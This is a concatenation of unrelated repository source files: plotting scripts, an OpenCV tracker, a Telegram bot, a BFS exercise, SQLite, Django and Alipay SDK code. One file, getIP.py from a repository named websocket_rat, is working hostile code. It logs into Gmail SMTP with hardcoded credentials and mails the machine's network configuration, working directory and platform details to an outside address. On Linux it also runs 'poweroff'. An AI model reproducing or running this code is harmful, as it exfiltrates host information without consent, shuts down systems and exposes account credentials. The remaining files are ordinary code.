    changed_stiffness_str = []
    changed_stiffness = []
    overal_change_str = []
    overal_change = []
    for j in range(1, len(ytick)*len(xtick)+1):
        stiffness.append(round(df[2][j], 5))
        opt_stiffness.append(round(df[3][j], 5))
        temp = str(round(100*(df[3][j] - df[2][j])/df[2][j], 2))
        temp2 = round(100*(df[3][j] - df[2][j])/df[2][j], 2)
        temp = temp + "%"
        changed_stiffness_str.append(temp)
        changed_stiffness.append(temp2)
        if j % len(ytick) == 0:
            overall_stiff.append(stiffness)
            overall_optstiff.append(opt_stiffness)
            overal_change_str.append(changed_stiffness_str)
            overal_change.append(changed_stiffness)
            stiffness = []
            opt_stiffness = []
            changed_stiffness_str = []
            changed_stiffness = []

    fig, ax = plt.subplots()
    im = ax.imshow(overall_stiff, vmin=1, vmax=6.5, cmap='autumn_r')
    cbar = ax.figure.colorbar(im, ax=ax)
    cbarlabel = "stiffness"
    cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize=12)
    # We want to show all ticks...
    ax.set_xticks(np.arange(len(ytick)))
    ax.set_yticks(np.arange(len(xtick)))
    # ... and label them with the respective list entries
    ax.set_xticklabels(ytick)
    ax.set_yticklabels(xtick)
    ax.set_xlabel('y (m)', fontsize=13)
    ax.set_ylabel('x (m)', fontsize=13)
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")
    for i in range(len(xtick)):
        for j in range(len(ytick)):
            text = ax.text(j, i, overall_stiff[i][j],
                           ha="center", va="center", color="black")
    ax.set_title("Stiffness of Non-optimized posture (" + axisname + " axis)", fontsize=16)
    fig.tight_layout()
    plt.show()

    fig, ax = plt.subplots()
    im = ax.imshow(overall_optstiff, vmin=1, vmax=6.5, cmap='autumn_r')
    cbar = ax.figure.colorbar(im, ax=ax)
    cbarlabel = "stiffness"
    cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize=12)
    # We want to show all ticks...
    ax.set_xticks(np.arange(len(ytick)))
    ax.set_yticks(np.arange(len(xtick)))
    # ... and label them with the respective list entries
    ax.set_xticklabels(ytick)
    ax.set_yticklabels(xtick)
    ax.set_xlabel('y (m)', fontsize=13)
    ax.set_ylabel('x (m)', fontsize=13)
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")
    for i in range(len(xtick)):
        for j in range(len(ytick)):
            text = ax.text(j, i, overall_optstiff[i][j],
                           ha="center", va="center", color="black")
    ax.set_title("Stiffness of optimized posture (" + axisname + " axis)", fontsize=16)
    fig.tight_layout()
    plt.show()

    fig, ax = plt.subplots()
    im = ax.imshow(overal_change, vmin=-100, vmax=500, cmap='autumn_r')
    cbar = ax.figure.colorbar(im, ax=ax)
    cbarlabel = "ratio of changed stiffness"
    cbar.ax.set_ylabel(cbarlabel, rotation=-90, va="bottom", fontsize=12)
    # We want to show all ticks...
    ax.set_xticks(np.arange(len(ytick)))
    ax.set_yticks(np.arange(len(xtick)))
    # ... and label them with the respective list entries
    ax.set_xticklabels(ytick)
    ax.set_yticklabels(xtick)
    ax.set_xlabel('y (m)', fontsize=13)
    ax.set_ylabel('x (m)', fontsize=13)
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")
    for i in range(len(xtick)):
        for j in range(len(ytick)):
            if overal_change[i][j] < 0:
                text = ax.text(j, i, overal_change_str[i][j],
                               ha="center", va="center", color="Red", fontweight="bold")
            else:
                text = ax.text(j, i, overal_change_str[i][j],
                               ha="center", va="center", color="black")
    ax.set_title("Ratio of changed stiffness (" + axisname + " axis)", fontsize=16)
    fig.tight_layout()
    plt.show()


if __name__ == "__main__":
    filename = ["../data/x_stiffness_compare.xlsx", "../data/y_stiffness_compare.xlsx", "../data/z_stiffness_compare.xlsx"]
    axisname = ["x", "y", "z"]
    for i in range(3):
        heatmap_read(filename[i], axisname[i])
|
[
"nswve@naver.com"
] |
nswve@naver.com
|
a01543ef0594a423e1f294ceca5a43fbd4ac689d
|
cf86197a7ee935514e58a0b1b064c9a0eba70c6d
|
/allu_pandas/__init__.py
|
ae47be0f466f4033bb94be1b37714c00663e20d2
|
[] |
no_license
|
skojaku/pandas-alluvial-diagram
|
ad73f7b473818aa43a48625e4dcd2ed26290f9b7
|
ab097a47b3904daaa938594982b0f638206b4279
|
refs/heads/main
| 2022-12-27T15:33:14.019571
| 2020-10-12T12:12:25
| 2020-10-12T12:12:25
| 302,910,261
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 73
|
py
|
__author__ = "Sadamori Kojaku"
from .utils import *
from .draw import *
|
[
"skojaku@iu.edu"
] |
skojaku@iu.edu
|
f6790ee837fdef6d4e761df0c30e06570b37f4f8
|
85385b6a88d9d23218be3fea576ea245b6c8cdad
|
/02.object_tracking.py
|
8e275ee534ba3b26f0f248dd7746ce10efc19fbb
|
[] |
no_license
|
agiledots/opencv-tracking
|
ded8191144287be94b1c8a1076788baa39662ab5
|
797e921b787e1d48ad6185232eb685c4b8e3d8d5
|
refs/heads/master
| 2020-03-19T03:06:16.067120
| 2018-06-01T09:10:59
| 2018-06-01T09:10:59
| 135,695,380
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,513
|
py
|
import cv2
import sys

# https://www.learnopencv.com/object-tracking-using-opencv-cpp-python/

(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')


def create_tracker():
    # Set up tracker.
    # Instead of MIL, you can also use
    tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN']
    tracker_type = tracker_types[2]

    if int(minor_ver) < 3:
        tracker = cv2.Tracker_create(tracker_type)
    else:
        if tracker_type == 'BOOSTING':
            tracker = cv2.TrackerBoosting_create()
        if tracker_type == 'MIL':
            tracker = cv2.TrackerMIL_create()
        if tracker_type == 'KCF':
            tracker = cv2.TrackerKCF_create()
        if tracker_type == 'TLD':
            tracker = cv2.TrackerTLD_create()
        if tracker_type == 'MEDIANFLOW':
            tracker = cv2.TrackerMedianFlow_create()
        if tracker_type == 'GOTURN':
            tracker = cv2.TrackerGOTURN_create()

    return (tracker, tracker_type)


if __name__ == '__main__':
    # Read video
    video = cv2.VideoCapture("./videos/In Pursuit Of The Giant Bluefin.mp4")

    # Exit if video not opened.
    if not video.isOpened():
        print("Could not open video")
        sys.exit()

    # Read first frame.
    ok, frame = video.read()
    if not ok:
        print('Cannot read video file')
        sys.exit()

    # Play the video until 'r' is pressed.
    while True:
        ok, frame = video.read()
        if not ok:
            print("Cannot read video")
            break
        # Display result
        cv2.imshow("Tracking", frame)
        if cv2.waitKey(1) & 0xFF == ord('r'):
            break

    # Define an initial bounding box
    bbox = (287, 23, 86, 320)

    # Uncomment the line below to select a different bounding box
    bbox = cv2.selectROI(frame, True)

    # create tracker
    tracker, tracker_type = create_tracker()

    # Initialize tracker with first frame and bounding box
    ok = tracker.init(frame, bbox)

    while True:
        # Read a new frame
        ok, frame = video.read()
        if not ok:
            break

        # Start timer
        timer = cv2.getTickCount()

        # Update tracker
        ok, bbox = tracker.update(frame)

        # Calculate Frames per second (FPS)
        fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)

        # restart: press 'r' to re-select the region and re-create the tracker
        if cv2.waitKey(1) & 0xFF == ord('r'):
            # create tracker
            tracker, tracker_type = create_tracker()
            bbox = cv2.selectROI(frame, True)
            # Initialize tracker with first frame and bounding box
            ok = tracker.init(frame, bbox)

        # Draw bounding box
        if ok:
            # Tracking success
            p1 = (int(bbox[0]), int(bbox[1]))
            p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))
            cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)
        else:
            # Tracking failure
            cv2.putText(frame, "Tracking failure detected", (100, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 255), 2)

        # Display tracker type on frame
        cv2.putText(frame, tracker_type + " Tracker", (100, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)

        # Display FPS on frame
        cv2.putText(frame, "FPS : " + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)

        # Display result
        cv2.imshow("Tracking", frame)

        # Exit if ESC pressed
        k = cv2.waitKey(1) & 0xff
        if k == 27:
            break
|
[
""
] | |
c6371681f05968aa9861b727a0d93db16af46a07
|
994cbc9972385b02f5ad7528ab1bc62363a92cb8
|
/getIP.py
|
12e511eaca5112b72f15b17ea1235018da16c157
|
[] |
no_license
|
Chetanck26/websocket_rat
|
8dde52c66b86105cebd618238073b6c469b12217
|
a607c1a5e7a74170c2c56682f1af08ef9c7ab53f
|
refs/heads/master
| 2020-03-28T02:26:01.931648
| 2018-09-05T14:14:06
| 2018-09-05T14:14:06
| 147,570,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
import json
import os
import platform
import smtplib
import subprocess

server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()  # port 587 is a STARTTLS port; login fails without this
server.login("cvdrat@gmail.com", "rat123rat123")

if platform.system().lower() == 'windows':
    cmd = subprocess.Popen("ipconfig", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
if platform.system().lower() == 'linux':
    # As in the original: this launches "poweroff" (which will shut the host
    # down) and then immediately replaces the handle with the "ifconfig" one.
    cmd = subprocess.Popen("poweroff", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    cmd = subprocess.Popen("ifconfig", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

standardOutput = str(cmd.stdout.read(), "utf-8")
standardError = str(cmd.stderr.read(), "utf-8")
response = {"status": "OK", "stdout": standardOutput, "stderr": standardError, "dir": str(os.getcwd()), "systemInfo": platform.platform()}
response = json.dumps(response)
server.sendmail("cvdrat@gmail.com", "hybridx18@gmail.com", response)
|
[
"chetan.k2626@gmail.com"
] |
chetan.k2626@gmail.com
|
33023065e0c2369fa3b6b3d94be20ca5db568b38
|
b48d274e38f0246e59a7f104ff6ca6a3e0f335b8
|
/main.py
|
4205712eaa2e1165433caa91395ebf7e93a2a98c
|
[] |
no_license
|
legacy72/bulling_controller_telegram_bot
|
6f412c1c84d430ac5b5bd72cd382b573be2c4c33
|
5f8eb776c9d7d5ac0087f50aa29ac505bcc9d235
|
refs/heads/master
| 2023-02-01T21:20:42.889336
| 2020-12-07T14:52:16
| 2020-12-07T14:52:16
| 319,351,377
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,243
|
py
|
import logging

import telebot

from utils import get_info_about_bullying, get_arg
from settings import TELEGRAM_TOKEN

logger = telebot.logger
telebot.logger.setLevel(logging.INFO)

bot = telebot.TeleBot(TELEGRAM_TOKEN)

PERCENTAGE_BULLYING = 80

# User-facing texts are in Russian; English glosses are given in comments.
commands = {
    'help': 'Помощь по боту',  # "Help for the bot"
    'set_quality_percentage': 'Установить с какой вероятностью считать, что текст буллинговый (по умолчанию 80%)',  # "Set the probability above which text counts as bullying (default 80%)"
    'show_quality_percentage': 'Посмотреть при какой вероятности считать, что текст буллинговый',  # "Show the probability above which text counts as bullying"
}


@bot.message_handler(commands=['start', 'help'])
def start_and_help_handler(message):
    cid = message.chat.id
    help_text = 'Список команд: \n'  # "List of commands:"
    for key in commands:
        help_text += f'/{key} : '
        help_text += f'{commands[key]}\n'
    bot.send_message(cid, help_text)


@bot.message_handler(commands=['set_quality_percentage'])
def set_quality_percentage(message):
    try:
        percentage = get_arg(message.text)
        global PERCENTAGE_BULLYING
        PERCENTAGE_BULLYING = percentage
        bot.reply_to(
            message, f'Теперь сообщение будет считаться буллинговым при вероятности выше {PERCENTAGE_BULLYING}%'  # "A message now counts as bullying above this probability"
        )
    except ValueError:
        bot.reply_to(message, 'Укажите через пробел число от 1 до 99')  # "Give a number from 1 to 99, separated by a space"


@bot.message_handler(commands=['show_quality_percentage'])
def show_quality_percentage(message):
    bot.reply_to(
        message, f'Сообщения будут считаться буллинговым при вероятности выше {PERCENTAGE_BULLYING}%'  # "Messages count as bullying above this probability"
    )


@bot.message_handler(func=lambda message: True)
def check_bullers_handler(message):
    bulling_percentage, bad_words = get_info_about_bullying(message.text)
    if bulling_percentage > PERCENTAGE_BULLYING:
        bot.reply_to(
            message,
            f'Ты кибербуллер! Буллишь на {bulling_percentage}%. '  # "You are a cyberbully! Bullying at N%."
            f'В буллинговых текстах часто встречаются слова:\n{bad_words}'  # "Bullying texts often contain the words: ..."
        )


bot.polling()
|
[
"sky45leg72"
] |
sky45leg72
|
22eacd6ecd3ea15128a98f216c4569f2222a8a52
|
bfbe8a27ce6f46a7f2d03731b1de1e80cc6056c9
|
/projects/inflearn/python_algorithm/dfs_bfs/사과나무.py
|
63265e21d4cdac9e7df703e7acc8f48746934524
|
[] |
no_license
|
paige0701/algorithms-and-more
|
95175a18fd9d4a41659c50e3c5e314fe2bb23b8b
|
763a4009f8fa87c24552b5e77375c72896672b58
|
refs/heads/master
| 2021-06-11T04:19:29.559758
| 2021-04-07T11:29:01
| 2021-04-07T11:29:01
| 184,376,577
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 880
|
py
|
def BFS(n, a):
    dx = [-1, 0, 1, 0]
    dy = [0, 1, 0, -1]
    ch = [[0] * n for _ in range(n)]
    sum = 0
    from collections import deque
    dq = deque()
    ch[n//2][n//2] = 1
    sum += a[n//2][n//2]
    dq.append((n//2, n//2))
    L = 0
    while True:
        if L == n//2:
            break
        size = len(dq)
        for i in range(size):
            tmp = dq.popleft()
            for j in range(4):
                x = tmp[0] + dx[j]
                y = tmp[1] + dy[j]
                if ch[x][y] == 0:
                    sum += a[x][y]
                    ch[x][y] = 1
                    dq.append((x, y))
        L += 1
    print(sum)


if __name__ == '__main__':
    n = 5
    a = [[10, 13, 10, 12, 15],
         [12, 39, 30, 23, 11],
         [11, 25, 50, 53, 15],
         [19, 27, 29, 37, 27],
         [19, 13, 30, 13, 19]]
    BFS(n, a)
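
# A quick check of the ring expansion above: BFS(n, a) visits the n//2 = 2
# rings around the centre, i.e. the diamond of cells with |i-2| + |j-2| <= 2,
# so for this grid it prints
# 10 + (39+30+23) + (11+25+50+53+15) + (27+29+37) + 30 = 379.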
|
[
"paigechoi0701@gmail.com"
] |
paigechoi0701@gmail.com
|
96e10e68064bc88b467883df35e36bbdb7fe6913
|
8fdab174252614c3d0eea09a4bd7aa262c087fd1
|
/python/Zetcode/SQLite Python Tutorial/metadata2.py
|
6ce7d488aaa21cea576206da7ea53fc0999cd394
|
[] |
no_license
|
idreesdb/Tutorials
|
a5190c72ad9ad25d9e8302c01357939bd62b75d8
|
754cd20250b7f826caf76a1d3c188826a4babbd3
|
refs/heads/master
| 2021-01-17T07:37:01.623156
| 2016-05-27T14:03:28
| 2016-05-27T14:03:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 420
|
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import sqlite3
import sys

with sqlite3.connect('test.db') as con:
    cur = con.cursor()
    cur.execute('SELECT * FROM Cars')
    col_names = [cn[0] for cn in cur.description]
    rows = cur.fetchall()
    print '{0} {1:<10} {2}'.format(col_names[0], col_names[1], col_names[2])
    for row in rows:
        print '{0:>2} {1:<10} {2}'.format(row[0], row[1], row[2])
|
[
"slxecas@gmail.com"
] |
slxecas@gmail.com
|
e3242e5b6f4f0a7f6b70c491d8fe59b69863e0a5
|
4e53e35d585302ee112dcba151d6d618664a1d66
|
/appenv/contacts/migrations/0001_initial.py
|
d36b65510630148a5ea82867b680a4d63efe2a3d
|
[] |
no_license
|
Samra78/DjangoApp
|
af2bcd150bbd606ea5ee2bd79be6609131ef6503
|
29875c88c9a4462a1c02930c69bba1d562d4b6e7
|
refs/heads/main
| 2023-05-06T02:16:13.987741
| 2021-05-26T17:09:28
| 2021-05-26T17:09:28
| 370,963,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 739
|
py
|
# Generated by Django 3.2.3 on 2021-05-26 06:54

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=40)),
                ('address', models.CharField(max_length=100)),
                ('phone', models.CharField(max_length=50)),
                ('email', models.CharField(max_length=60)),
                ('contact_type', models.CharField(max_length=20)),
            ],
        ),
    ]
|
[
"samrakkamal@gmail.com"
] |
samrakkamal@gmail.com
|
37a95443478590c3cbdfe96c13b7ad5986f5020e
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayCommerceTransportParkingGoodsCreateResponse.py
|
b2c2b21d034b4e3cc1f3f0ba3b1ab70a31f0f35f
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,002
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json

from alipay.aop.api.response.AlipayResponse import AlipayResponse


class AlipayCommerceTransportParkingGoodsCreateResponse(AlipayResponse):

    def __init__(self):
        super(AlipayCommerceTransportParkingGoodsCreateResponse, self).__init__()
        self._goods_id = None
        self._out_id = None

    @property
    def goods_id(self):
        return self._goods_id

    @goods_id.setter
    def goods_id(self, value):
        self._goods_id = value

    @property
    def out_id(self):
        return self._out_id

    @out_id.setter
    def out_id(self, value):
        self._out_id = value

    def parse_response_content(self, response_content):
        response = super(AlipayCommerceTransportParkingGoodsCreateResponse, self).parse_response_content(response_content)
        if 'goods_id' in response:
            self.goods_id = response['goods_id']
        if 'out_id' in response:
            self.out_id = response['out_id']
|
[
"jiandong.jd@antfin.com"
] |
jiandong.jd@antfin.com
|
6e03e8986c8577684ada604fb5f240598e0c42bf
|
5b6630541711827376267f825cc0c2d497e1cf4c
|
/tests/test_python.py
|
04087e65a4d9e15d91a619889df979be7d7331c4
|
[] |
no_license
|
odoucet/cig-springchallenge2020
|
4b41344e06f148423c0bdfc68d20b64039e83511
|
e39e54f1cca49ec559b78a930cb0897f2ebc7ee7
|
refs/heads/master
| 2023-07-26T09:00:20.874774
| 2020-05-14T17:41:16
| 2020-05-14T17:41:16
| 262,107,360
| 1
| 0
| null | 2023-07-06T21:36:24
| 2020-05-07T16:51:06
|
Python
|
UTF-8
|
Python
| false
| false
| 153
|
py
|
import numpy


def test_python():
    tmpcarte = numpy.full( (6, 6), numpy.nan )
    #tmpcarte.fill(numpy.nan)
    assert numpy.isnan(tmpcarte[0][5])
|
[
"olivier@oxeva.fr"
] |
olivier@oxeva.fr
|
5c2a507b7cfa64077e5854eee400a8dca631e971
|
acda8294b7b670668f25e445ab2233b2c6b214d1
|
/external_scripts/create_references_csv/create_references_csv.py
|
8865e1669a14b8b1a330d1db4883167131a6f5e5
|
[
"MIT"
] |
permissive
|
leoisl/pandora_paper_roc
|
6cb76cfe84d832de6c3d3525947fe8af712637df
|
bb21c76faefa8021c86c3be9d77b8b5999fe2ef5
|
refs/heads/master
| 2023-06-22T18:18:34.951817
| 2021-06-21T19:22:08
| 2021-06-21T19:22:08
| 310,068,005
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,238
|
py
|
# configs
references_folder = "references_subset"
suffix = ".fna.gz"

from pathlib import Path
from glob import glob
import subprocess
import pandas as pd


def run_command(command):
    subprocess.check_call(command, shell=True)


def get_reference_id(uncompressed_file):
    with open(uncompressed_file) as uncompressed_filehandler:
        line = uncompressed_filehandler.readline()
        reference_id = line.split()[0][1:]
        return reference_id


def main():
    reference_ids = []
    compressed_files = []
    uncompressed_files = []
    for file in glob(f"{references_folder}/*{suffix}"):
        compressed_file = Path(file).absolute()
        uncompressed_file = compressed_file.with_suffix("")
        run_command(f"gunzip -c {compressed_file} > {uncompressed_file}")
        reference_id = get_reference_id(uncompressed_file)
        reference_ids.append(reference_id)
        compressed_files.append(compressed_file)
        uncompressed_files.append(uncompressed_file)
    df = pd.DataFrame(data={"reference_id": reference_ids,
                            "compressed_file": compressed_files,
                            "uncompressed_file": uncompressed_files})
    df.to_csv("references.csv", index=False)


main()
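
# The references.csv written above has one row per "*.fna.gz" input; the
# reference_id is the first word of the FASTA header, minus the leading ">".
# For example (file names and id below are hypothetical):
# reference_id,compressed_file,uncompressed_file
# NC_000913.3,/abs/path/references_subset/ecoli.fna.gz,/abs/path/references_subset/ecoli.fna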
|
[
"leandro@ebi.ac.uk"
] |
leandro@ebi.ac.uk
|
804dc216d8efb2d65ef85ee2e7305dc58c150f65
|
193e69d4ad303949d8facf1cd7aaef2f1452b6da
|
/memory_tests/results/memops_scalability/plot_csv.py
|
d92d73a91a51e6656ebe4ce5bf753b354cd9a6e5
|
[] |
no_license
|
anastop/archbench
|
804bf53aeeaa34099f125418f169302a7e428bcb
|
7663f0a56e3abe728ea696e2b1be45a17910d16b
|
refs/heads/master
| 2020-12-24T13:28:07.315391
| 2020-12-18T14:22:08
| 2020-12-18T14:22:08
| 33,410,156
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,285
|
py
|
#!/usr/bin/env python

import sys
import matplotlib
#matplotlib.use('PDF')
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import mlab
from util import *

infile = sys.argv[1]
f1 = open(infile, 'r')
csvfile = infile + '.csv'
f2 = open(csvfile, 'w')

maxthreads = 0
linearray = []
ops = []
for line in f1.readlines():
    if 'nthreads:' in line:
        linearray.append(line.strip())
        maxthreads = max(maxthreads, int(get_val(line, 'nthreads:')))
        cur_op = get_val(line, 'op:')
        if cur_op not in ops:
            ops.append(cur_op)

# print header
f2.write('nthreads ' + ' '.join(ops) + " \n")

# print column values
for thread in range(1, maxthreads+1):
    f2.write(str(thread) + " ")
    for op in ops:
        for line in linearray:
            if ('nthreads:' + str(thread) + ' ') in line and ('op:' + op + ' ') in line:
                f2.write(get_val(line, 'cycles:') + ' ')
    f2.write('\n')
f2.close()

#########################################################################

a = mlab.csv2rec(csvfile, delimiter=' ')

## SHORT version
selected_cols = (
    #'rd_priv_1var',
    #'rd_priv_1var_misal',
    #'rd_priv_fit_l1',
    #'rd_priv_nofit_llc',
    'rd_shrd_1var',
    #'rd_shrd_1var_misal',
    #'rd_shrd_fit_l1',
    #'rd_shrd_nofit_llc',
    #'wr_priv_1var',
    #'wr_priv_1var_misal',
    #'wr_priv_fit_l1',
    #'wr_priv_nofit_llc',
    'wr_shrd_1var',
    #'wr_shrd_1var_misal',
    #'wr_shrd_fit_l1',
    #'wr_shrd_nofit_llc',
    #'rmw_priv_1var',
    #'rmw_priv_1var_misal',
    #'rmw_priv_fit_l1',
    #'rmw_priv_nofit_llc',
    'rmw_shrd_1var',
    #'rmw_shrd_1var_misal',
    #'rmw_shrd_fit_l1',
    #'rmw_shrd_nofit_llc',
    #'atomic_rmw_priv_1var',
    #'atomic_rmw_priv_1var_misal',
    #'atomic_rmw_priv_fit_l1',
    #'atomic_rmw_priv_nofit_llc',
    #'atomic_rmw_shrd_1var',
    #'atomic_rmw_shrd_1var_misal',
    #'atomic_rmw_shrd_fit_l1',
    #'atomic_rmw_shrd_nofit_llc',
    #'mfence_reg',
    #'mfence_wrmem',
    #'mfence_rmwmem_1var',
    #'mfence_rmwmem_nofit_llc',
    #'mfence_lockadd_reg',
    #'mfence_lockadd_wrmem',
    #'mfence_lockadd_rmwmem_1var',
    #'mfence_lockadd_rmwmem_nofit_llc',
)

curves = []
for col in selected_cols:
    c = plt.plot(a.nthreads, a[col], 'o-', linewidth=2)
    curves.append(c)
plt.legend(curves, map(str.upper, selected_cols), loc='best')

## VERBOSE version
"""
l = plt.plot(
    a.nthreads, a.wr_priv_1var, 'o-',
    a.nthreads, a.wr_priv_1var_misal, 'o-',
    a.nthreads, a.wr_priv_fit_l1, 'o-',
    a.nthreads, a.wr_priv_nofit_llc, 'o-',
    a.nthreads, a.wr_shrd_1var, 'o-',
    a.nthreads, a.wr_shrd_1var_misal, 'o-',
    a.nthreads, a.wr_shrd_fit_l1, 'o-',
    a.nthreads, a.wr_shrd_nofit_llc, 'o-',
    linewidth=2)
plt.legend(l,
    (
        'WR-PRIV-1VAR',
        'WR-PRIV-1VAR-MISAL',
        'WR-PRIV-FIT-L1',
        'WR-PRIV-NOFIT-LLC',
        'WR-SHRD-1VAR',
        'WR-SHRD-1VAR-MISAL',
        'WR-SHRD-FIT-L1',
        'WR-SHRD-NOFIT-LLC',
    ),
    loc='best'
)
"""

leg = plt.gca().get_legend()
ltext = leg.get_texts()
llines = leg.get_lines()
plt.setp(ltext, fontsize='small')
plt.setp(llines, linewidth=2)

r = plt.axis()
plt.axis([0.5, maxthreads+0.5, 0, r[3]])
#plt.grid(True)
plt.ylabel('Avg. cycles per operation')
plt.xlabel('#Threads')
#plt.title('Performance')
plt.show()
#plt.savefig('myfig.pdf')
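
# Note: matplotlib.mlab.csv2rec was deprecated in Matplotlib 2.2 and later
# removed; on a modern stack the same record array can be loaded with, e.g.,
# a = np.genfromtxt(csvfile, delimiter=' ', names=True).view(np.recarray)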
|
[
"n.anastop@gmail.com"
] |
n.anastop@gmail.com
|
da87e2b3975340596bb10584cb4a3569e4aabcc6
|
5ede9a684485630ec925088d19618be1cbc5ff08
|
/src/simulation.py
|
467eb39337bba1ac76b6b4aeb2d242545d8e3fd9
|
[] |
no_license
|
mgoldenb/EvacuationPolicies
|
af2e56c7df5e5faadfb1058299d22feecaef2ef9
|
e511236c6c98e84aafdf91fa7224e8eaf6fefbd4
|
refs/heads/master
| 2020-04-27T15:15:53.173068
| 2014-02-09T17:23:52
| 2014-02-09T17:23:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
from common import *


class Simulation:
    def __init__(self, instance, timeThreshold):
        self.instance = instance
        self.agents = agents = instance.agents
        self.policies = policies = instance.policies
        self.timeThreshold = timeThreshold
        self.paths = paths = [[agent] for agent in agents]
        self.colors = colors = [[policy.color] for policy in policies]
        self.directions = [[] for agent in agents]
        for time in range(1, timeThreshold + 1):
            self.resolutionDecisions = {}
            self.processConflicts(time)
            policyChanged = False
            for i in range(len(agents)):
                self.directions[i].append(self._wants[i])
                if not self._successFlags[i]:
                    if (policies[i].negativeFeedback(changeAllowedFlag = True)):
                        policyChanged = True
            if policyChanged:
                self.processConflicts(time)
            for i in range(len(agents)):
                colors[i].append(policies[i].color)
                if self._successFlags[i]:
                    paths[i].append(self._wants[i])
                    policies[i].positiveFeedback()
                else:
                    paths[i].append(self._curs[i])
                    policies[i].negativeFeedback(changeAllowedFlag = False)
            self.nSaved = sum((1 if path[-1] in instance.exits else 0) for path in paths)
            if self.nSaved == instance.nAgents:
                self.timeThreshold = time
                break

    def processConflicts(self, time):
        self._successFlags = successFlags = [True] * len(self.agents)
        self._curs = [self.paths[i][time-1] for i in range(len(self.agents))]
        self._wants = [self.policies[i].next() for i in range(len(self.agents))]
        self.processTypedConflicts(time, "Collision")
        while True:
            nConflicts = self.processTypedConflicts(time, "IntoWaiting")
            if nConflicts == 0: break

    def processTypedConflicts(self, time, type):
        nConflicts = 0
        successFlags = self._successFlags
        agents = self.agents
        for i in range(len(agents)):
            i_cur = self._curs[i]
            i_wants = (self._wants[i] if successFlags[i] else i_cur)
            if i_wants in self.instance.exits: continue
            for j in range(0, i):
                j_cur = self._curs[j]
                j_wants = (self._wants[j] if successFlags[j] else j_cur)
                if j_wants in self.instance.exits: continue
                if i_wants == j_wants:
                    nConflicts += 1
                    if type == "Collision":
                        if i_cur == i_wants or j_cur == j_wants: continue
                        try:
                            winner = self.resolutionDecisions[(i,j)]
                        except:
                            winner = (i if random.randint(False, True) else j)
                            self.resolutionDecisions[(i,j)] = self.resolutionDecisions[(j,i)] = winner
                        if winner == j:
                            successFlags[i] = False
                            break
                        else:
                            successFlags[j] = False
                            continue
                    if type == "IntoWaiting":
                        if j_cur == j_wants:
                            successFlags[i] = False
                            break
                        if i_cur == i_wants:
                            successFlags[j] = False
                            break
        return nConflicts
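
# How collisions are resolved above: when agents i and j both want the same
# cell, a coin flip (random.randint(False, True) is just randint(0, 1)) picks
# the winner once per (i, j) pair and is cached in resolutionDecisions, so
# repeated resolutions of the same pair within a time step stay consistent.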
|
[
"mgoldenbe@gmail.com"
] |
mgoldenbe@gmail.com
|
52e020ec81c3b576b9d59261084f29054930abca
|
527ecc95854a8448969b7ec9587730760008d49e
|
/Code/DialogueEvaluation/No_Ctxt_No_Gold_Merge/no_gold_config.py
|
de8614e9cc33276f353e155b9f180c063413f82c
|
[] |
no_license
|
SourKream/DERP
|
1b4cd49332a13a9b08e32cef06869add4383c776
|
874e6f77dff1266290b090055a41d03e7ac6a0b4
|
refs/heads/master
| 2021-03-16T06:13:49.469159
| 2017-08-21T16:56:19
| 2017-08-21T16:56:19
| 81,952,482
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,483
|
py
|
# model params
CTXT_GRU_HIDDEN_STATE = 512
RESP_GRU_HIDDEN_STATE = 300
VOCAB_SIZE = 50000 # 1 for UNK
MAX_RESP_LEN = 50
MAX_CTX_LEN = 500
EMBEDDING_DIM = 300
DENSE_HIDDEN_STATE = 100
DROPOUT = 0.3
use_attention = True
# training details
